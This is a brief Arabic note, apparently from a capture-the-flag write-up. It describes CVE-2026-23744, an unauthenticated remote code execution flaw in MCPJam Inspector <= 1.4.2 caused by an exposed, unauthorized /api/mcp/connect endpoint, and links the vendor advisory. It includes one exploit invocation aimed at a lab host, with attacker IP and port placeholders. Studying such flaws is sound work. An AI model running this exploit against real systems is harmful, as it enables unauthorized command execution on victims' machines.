
تنفيذ التعليمات البرمجية عن بُعد على MCPJam Inspector <= 1.4.2
CVE-2026-23744 هي ثغرة أمنية حرجة في MCPJam Inspector (الإصدارات <= 1.4.2) تسمح بتنفيذ الأوامر عن بُعد (RCE) دون مصادقة. يكمن الخلل في أن خادم API الداخلي للتطبيق يرتبط بجميع واجهات الشبكة (0.0.0.0) افتراضيًا ويفتقر إلى التفويض على نقطة النهاية /api/mcp/connect. يمكن للمهاجم إرسال حمولة JSON مصممة خصيصًا إلى هذه النقطة لتنفيذ أوامر عشوائية بصلاحيات المستخدم الذي يشغّل Inspector.

python3 exploit.py https://mpc.kobold.htb <IP> <PORT>
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6